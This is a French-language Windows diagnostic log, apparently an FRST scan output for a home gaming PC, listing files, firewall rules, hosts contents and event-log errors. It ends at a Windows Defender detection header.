2017-09-14 08:37 - 2017-09-14 08:37 - 000245760 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qjpeg.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000021504 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qsvg.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000020992 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qtga.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000316416 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qtiff.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000019968 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qwbmp.dll
2017-09-14 08:42 - 2017-09-14 08:42 - 000322560 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\imageformats\qwebp.dll
2017-09-14 08:37 - 2017-09-14 08:37 - 001010688 _____ (The Qt Company Ltd) [Fichier non signé] C:\Users\Luca\AppData\Local\MEGAsync\platforms\qwindows.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
AlternateDataStreams: C:\Users\Luca:.repos [6040176]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [480]
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3183337316-3821782573-710669081-1001\...\localhost -> localhost
==================== Hosts contenu: ===============================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2018-09-15 09:31 - 2019-06-06 18:54 - 000000027 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 localhost
2018-12-27 01:43 - 2018-12-27 01:44 - 000000375 _____ C:\Windows\system32\drivers\etc\hosts.ics
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3183337316-3821782573-710669081-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Luca\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\d7df5243cea0abf8e4484b160a0bf5ad.png
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [{C4CEA4D4-E70C-40C3-8B77-44C479EC0228}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe Pas de fichier
FirewallRules: [{C67B3A3E-974E-43B0-913B-CEDA61111E3F}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe Pas de fichier
FirewallRules: [TCP Query User{E7A56644-F9BE-4B00-9FFA-C8AA1350138E}D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe] => (Allow) D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe Pas de fichier
FirewallRules: [UDP Query User{5C2D6D4E-6A25-492B-B4D9-C0E988B87596}D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe] => (Allow) D:\jeux\gog games\star wars - battlefront 2\gamedata\battlefrontii.exe Pas de fichier
FirewallRules: [{35AA7FF1-6EC8-4B9B-862B-252C003854BE}] => (Allow) E:\Programmes\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{6D5EE91C-225B-41BF-8322-4547FAFF75B4}] => (Allow) E:\Programmes\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{EFD538F9-120B-49FF-8E48-B29B8D951348}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier
FirewallRules: [{E75B2E82-02AE-49EE-A9A5-784F637EF68F}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7\steamwebhelper.exe Pas de fichier
FirewallRules: [{67031B8B-8761-4A56-A50C-4BECFAB6B261}] => (Allow) E:\Programmes\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe Pas de fichier
FirewallRules: [{0DAC699D-9F95-4B1F-A760-D969DB55FE23}] => (Allow) E:\Programmes\Steam\steamapps\common\ShadowOfMordor\x64\ShadowOfMordor.exe Pas de fichier
FirewallRules: [TCP Query User{6D787ACA-9FAE-4E26-8C3A-2B4F1F1FBAEE}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [UDP Query User{681339B6-4D2F-4BA6-A2CE-6BBFF63A2A4C}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [TCP Query User{7F8014BB-0A4E-4FE2-87EF-E6C0126305EB}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{C65F0971-39F5-4CDA-BB6E-574B570A328A}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{8F6822C5-6291-48B8-91C3-95B88BB99EB3}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe Pas de fichier
FirewallRules: [UDP Query User{A688A63B-A5DB-4CE9-AF24-791ABF016E11}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe Pas de fichier
FirewallRules: [TCP Query User{86A23B8D-418C-4B18-887A-34D190D5A858}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [UDP Query User{1EB99348-BBE4-4FB6-BE07-0918B69CF291}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [TCP Query User{5B672003-343F-435E-98BE-48DED4158035}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [UDP Query User{B477D79A-DBFE-4B9A-8C99-050360155387}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [TCP Query User{12667AE2-6AF7-40F5-A88F-176AA391EACD}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [UDP Query User{575511C8-FD2E-4AA2-B868-855D5476BFF2}C:\program files\epic games\subnautica\subnautica.exe] => (Allow) C:\program files\epic games\subnautica\subnautica.exe Pas de fichier
FirewallRules: [TCP Query User{56A278BB-9126-4E6F-8D78-EC058244BE89}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [UDP Query User{FFA7B4FC-9B76-4827-A22C-B31D0F55F750}E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\1.8.0_51\bin\javaw.exe Pas de fichier
FirewallRules: [{DBB6B518-C598-48BD-B6C8-8E1FA3EFCEDA}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{B81FD013-E746-4667-8D1B-973BCDB67C1C}] => (Allow) E:\Programmes\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{DC19BA6F-F7E6-4EFA-AE37-8A5E09050C6B}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [UDP Query User{1B71BB45-B1AC-4FE0-B2AA-A026D108CC9E}C:\program files (x86)\call of duty black ops 4\blackops4.exe] => (Allow) C:\program files (x86)\call of duty black ops 4\blackops4.exe Pas de fichier
FirewallRules: [TCP Query User{55629635-C996-4972-B538-E8D189F7808B}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe Pas de fichier
FirewallRules: [UDP Query User{86C09AC4-F7D5-4B23-A399-BF469BD48669}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe Pas de fichier
FirewallRules: [TCP Query User{FB1AB133-B875-4077-B2B3-8FF49B5AD0AE}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{4FFA4234-5518-4633-862C-F28EEF9337B8}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Block) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{C27C0DB4-FC1B-4E0B-880D-C4988CEAC03B}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [UDP Query User{8BF721A4-84F4-4E61-8FA0-7B807877B07A}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [TCP Query User{22476E33-6B7A-4419-92A8-68ACAF31CF23}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [UDP Query User{DF877D81-21B9-4CB1-8905-7002C430D745}C:\program files (x86)\origin games\apex\r5apex.exe] => (Allow) C:\program files (x86)\origin games\apex\r5apex.exe (NVIDIA GameStream Server -> Respawn Entertainment) [Fichier non signé]
FirewallRules: [{BCB089B5-4E0E-41D0-8D5F-87D0F394F941}] => (Allow) C:\Program Files (x86)\theHunter\launcher\launcher.exe Pas de fichier
FirewallRules: [{1ADC4F7C-FA1F-48CB-BE41-D5FB30F21B4C}] => (Allow) C:\Program Files (x86)\theHunter\launcher\launcher.exe Pas de fichier
FirewallRules: [TCP Query User{90D38539-2AC8-4316-B73F-039C62A392A0}C:\program files (x86)\thehunter\game\thehunter.exe] => (Allow) C:\program files (x86)\thehunter\game\thehunter.exe Pas de fichier
FirewallRules: [UDP Query User{00F416D7-78F6-42DF-A59E-86A5E143133E}C:\program files (x86)\thehunter\game\thehunter.exe] => (Allow) C:\program files (x86)\thehunter\game\thehunter.exe Pas de fichier
FirewallRules: [TCP Query User{020860F0-2485-43A8-9ED6-7AAC611A4029}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [UDP Query User{73B648D0-CD17-40F9-AAE6-6CF0DBBDD2BF}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [TCP Query User{3617A8B4-3209-4C9F-8AA3-BA7CA6AC2973}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [UDP Query User{65323F0D-A247-42D9-A1B0-E79B162F05A9}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe Pas de fichier
FirewallRules: [{CBB53F6B-3F4F-43A1-8B14-41ABC000128C}] => (Allow) E:\Programmes\Steam\steamapps\common\Rust\Rust.exe (Facepunch Studios Ltd -> EasyAntiCheat Ltd)
FirewallRules: [{34D5DCF2-BB16-4DF6-8EFE-31D3E19D2D9F}] => (Allow) E:\Programmes\Steam\steamapps\common\Rust\Rust.exe (Facepunch Studios Ltd -> EasyAntiCheat Ltd)
FirewallRules: [{CE6BC38F-CA22-413D-AEC6-C89D8F6FAE7D}] => (Allow) E:\Programmes\Ubisoft Game Launcher\games\Far Cry New Dawn\bin\FarCryNewDawn.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [{E550E28E-B208-466F-BD78-AD1CCABFCD77}] => (Allow) E:\Programmes\Ubisoft Game Launcher\games\Far Cry New Dawn\bin\FarCryNewDawn.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft Entertainment)
FirewallRules: [TCP Query User{B9C0DFCC-BFA0-4050-9531-5F46240D6E34}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{69712AE2-51A0-44C4-B89C-1646B53437FC}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [{CF8F908A-B65A-47FB-9B99-0A866398A15D}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{4C7B65AA-4F13-4E17-8713-3FCC22A35940}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [TCP Query User{66F740C6-28A6-4058-BE32-59FCADD943E5}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{898A3415-E169-4826-8DF2-066E1BC5D6C3}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{4CF55510-DEA4-4585-AD0E-93E9DD252581}C:\program files\java\jre1.8.0_211\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_211\bin\javaw.exe
FirewallRules: [UDP Query User{37B9B4FF-34FA-4530-82BF-FE0A07C50B2F}C:\program files\java\jre1.8.0_211\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_211\bin\javaw.exe
FirewallRules: [TCP Query User{B87284A4-69A5-4F69-BC01-ACD7F65E17C0}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{31858F16-4FC0-4EA1-A957-58CEFB33B211}E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) E:\programmes\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{97135BF8-D015-43C2-8FFD-C45775919654}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [UDP Query User{2471A425-C42B-4D30-8859-C6BA07333646}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [{22CF977F-189A-4737-9BD7-EA5B1197A030}] => (Allow) LPort=25565
FirewallRules: [TCP Query User{1A9862BD-029E-491D-89C7-0A50B42E95DB}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [UDP Query User{3579A541-D31A-4F67-B593-0FEA5E359D40}C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe] => (Allow) C:\program files (x86)\common files\oracle\java\javapath_target_94430703\java.exe
FirewallRules: [{3DA9B534-2530-4983-8217-CC5196CC7AA6}] => (Allow) E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> )
FirewallRules: [{C15E1FA4-3978-41C5-9DAE-3DF9C9839F28}] => (Allow) E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve -> )
FirewallRules: [{450F456A-E430-49B9-B908-7C1C97C28236}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2EC9F487-1DCC-490C-A487-F20E81496931}] => (Allow) C:\Program Files (x86)\Primary\Velde.exe Pas de fichier
FirewallRules: [{F0683852-B532-49BA-9EF3-AB7D501B755C}] => (Allow) C:\Program Files (x86)\Otherwise\Sixth.exe Pas de fichier
FirewallRules: [{F13038C6-837D-4D32-B087-2FC59EB9A3E7}] => (Allow) C:\Windows\SysWOW64\TCPSVCS.EXE (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A894EA88-5A13-4BC4-86DE-3D7DD87FE105}] => (Allow) C:\Windows\system32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [TCP Query User{BB989E8A-243D-4344-8630-3BD9DE15F90E}C:\windows\syswow64\svchost.exe] => (Allow) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [UDP Query User{76EE825A-9037-4EDB-948A-4E8D65A59030}C:\windows\syswow64\svchost.exe] => (Allow) C:\windows\syswow64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{1B45E94C-9189-4E07-B82C-B3C152A112D6}] => (Allow) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{49089F59-0077-4D4E-B8CE-E1E848ABAA3E}] => (Allow) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{A3057545-81EC-4A53-B8DD-A1856FF90A50}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{E0EF78D4-FD5E-446C-AD43-7D762D537C68}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{A57B14B8-BFC1-411E-803D-B5F3513CDFCB}] => (Allow) C:\Program Files (x86)\Origin Games\Apex\EasyAntiCheat_launcher.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{16677F5E-12B7-413B-B742-9A695E7602AA}] => (Allow) E:\Programmes\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe (Psyonix, Inc) [Fichier non signé]
FirewallRules: [{7788B0C5-1E7D-49BE-ACC1-370D1213859C}] => (Allow) E:\Programmes\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe (Psyonix, Inc) [Fichier non signé]
==================== Points de restauration =========================
==================== Éléments en erreur du Gestionnaire de périphériques =============
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (06/06/2019 06:54:40 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Erreur du service de cliché instantané des volumes : erreur lors de l’appel de la routine QueryFullProcessImageNameW. hr = 0x80070006, Descripteur non valide
.
Opération :
Opération asynchrone en cours d’exécution
Contexte :
État actuel: DoSnapshotSet
Error: (06/06/2019 06:54:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddWin32ServiceFiles: Unable to back up image of service YmE0YTczM2Q0Njc3 since QueryServiceConfig API failed
System Error:
Le fichier spécifié est introuvable.
.
Error: (06/06/2019 06:54:31 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Erreur du service de cliché instantané des volumes : erreur lors de l’interrogation de l’interface IVssWriterCallback. hr = 0x80070005, Accès refusé.
.
Cette erreur est souvent due à des paramètres de sécurité incorrects dans le processus du rédacteur ou du demandeur.
Opération :
Données du rédacteur en cours de collecte
Contexte :
ID de classe du rédacteur: {e8132975-6f93-4464-a53e-1050253ae220}
Nom du rédacteur: System Writer
ID d’instance du rédacteur: {cccd316a-d263-4312-8e29-9ddfca0a8536}
Error: (06/04/2019 07:33:48 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme ShellExperienceHost.exe version 10.0.17763.439 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : df8
Heure de début : 01d51af3da608f31
Heure d'arrêt : 4294967295
Chemin d'accès à l'application : C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
ID de rapport : 885f3f53-8406-466e-8466-7343da7f413a
Nom complet du package défectueux : Microsoft.Windows.ShellExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy
ID de l'application relative à un package défectueux : App
Type de blocage : Quiesce
Error: (06/04/2019 07:11:39 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme csgo.exe version 0.0.0.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : 2988
Heure de début : 01d51af83b03ee7e
Heure d'arrêt : 644
Chemin d'accès à l'application : E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
ID de rapport : d1368d0a-c808-44e2-b772-7b71f0e3affd
Nom complet du package défectueux :
ID de l'application relative à un package défectueux :
Type de blocage : Unknown
Error: (06/04/2019 07:00:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme SkypeApp.exe version 8.46.0.60 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : 1f18
Heure de début : 01d51af3b7f58299
Heure d'arrêt : 4294967295
Chemin d'accès à l'application : C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeApp.exe
ID de rapport : 0d69ff58-c0e5-4bf5-97a4-5415d1d62d6c
Nom complet du package défectueux : Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c
ID de l'application relative à un package défectueux : App
Type de blocage : Quiesce
Error: (06/04/2019 06:38:29 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme AvastUI.exe version 19.5.4444.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.
ID de processus : 2558
Heure de début : 01d51af3bf717b9c
Heure d'arrêt : 6904
Chemin d'accès à l'application : C:\Program Files\AVAST Software\Avast\AvastUI.exe
ID de rapport : 5e48dacc-4573-4152-bfed-16d12c5227fa
Nom complet du package défectueux :
ID de l'application relative à un package défectueux :
Type de blocage : Unknown
Error: (06/04/2019 06:37:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante Explorer.EXE, version : 10.0.17763.348, horodatage : 0x03d46193
Nom du module défaillant : ntdll.dll, version : 10.0.17763.475, horodatage : 0x3230aa04
Code d’exception : 0xc0000374
Décalage d’erreur : 0x00000000000fb049
ID du processus défaillant : 0x15e4
Heure de début de l’application défaillante : 0x01d51af3b5c65531
Chemin d’accès de l’application défaillante : C:\Windows\Explorer.EXE
Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll
ID de rapport : 998d124d-7db6-462e-a9d2-8a350ac1e03c
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Erreurs système:
=============
Error: (06/06/2019 07:30:20 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA)
Description: Le serveur {E48EDA45-43C6-48E0-9323-A7B2067D9CD5} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (06/06/2019 07:28:20 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA)
Description: Le serveur {B52D54BB-4818-4EB9-AA80-F9EACD371DF8} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (06/06/2019 07:26:20 PM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT)
Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (06/06/2019 07:26:13 PM) (Source: DCOM) (EventID: 10016) (User: PC-DE-LUCA)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{2593F8B9-4EAF-457C-B68A-50F6B8EA6B54}
et l’APPID
{15C20B67-12E7-4BB6-92BB-7AFF07997402}
au SID PC-DE-LUCA\Luca de l’utilisateur (S-1-5-21-3183337316-3821782573-710669081-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
Error: (06/06/2019 07:25:07 PM) (Source: DCOM) (EventID: 10016) (User: PC-DE-LUCA)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{2593F8B9-4EAF-457C-B68A-50F6B8EA6B54}
et l’APPID
{15C20B67-12E7-4BB6-92BB-7AFF07997402}
au SID PC-DE-LUCA\Luca de l’utilisateur (S-1-5-21-3183337316-3821782573-710669081-1001) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
Error: (06/06/2019 07:24:42 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
et l’APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
Error: (06/06/2019 07:24:42 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
et l’APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
Error: (06/06/2019 07:23:42 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Le service AMD User Experience Program Launcher s’est terminé de façon inattendue pour la 1ème fois.
Windows Defender:
===================================
Date: 2019-06-04 02:01:52.845
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
